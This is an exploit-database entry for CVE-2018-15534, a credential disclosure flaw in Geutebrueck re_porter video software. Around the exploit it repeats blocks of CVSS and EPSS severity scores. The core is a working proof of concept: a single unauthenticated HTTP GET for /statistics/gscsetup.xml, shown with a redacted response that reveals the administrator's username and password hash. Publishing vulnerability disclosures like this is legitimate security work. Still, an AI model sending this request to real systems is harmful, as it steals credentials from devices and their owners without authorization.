Kamil SuskaEDB-ID:45240Geutebrueck re_porter 7.8.974.20 - Credential Disclosure
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 High
AI Score
Confidence
High
0.795 High
EPSS
Percentile
98.3%
# Exploit Title: Geutebrueck re_porter 7.8.974.20 - Credential Disclosure
# Date: 2018-08-03
# Exploit Author: Kamil Suska
# Vendor: https://www.geutebrueck.com/en_US.html
# Link: https://www.sourcesecurity.com/geutebruck-re-porter-16-technical-details.html
# Version: prior 7.8.974.20
# CVE-2018-15534
# PoC
GET /statistics/gscsetup.xml HTTP/1.1
Host: example.com:12003
# Result (Redacted):
<Node Name="UserList" NodeID="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
<Node Name="0000" NodeID="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
<Value Name="Name" ValueType="ntWideString" Value="Sysadmin"/>
<Value Name="Password" ValueType="ntString"
Value="##MD5passwordhash##"/>
<Value Name="UserRights" ValueType="ntInt32" Value="0x00000001"/>
<Node Name="SecondUserList"
NodeID="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
</Node>Related
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 High
AI Score
Confidence
High
0.795 High
EPSS
Percentile
98.3%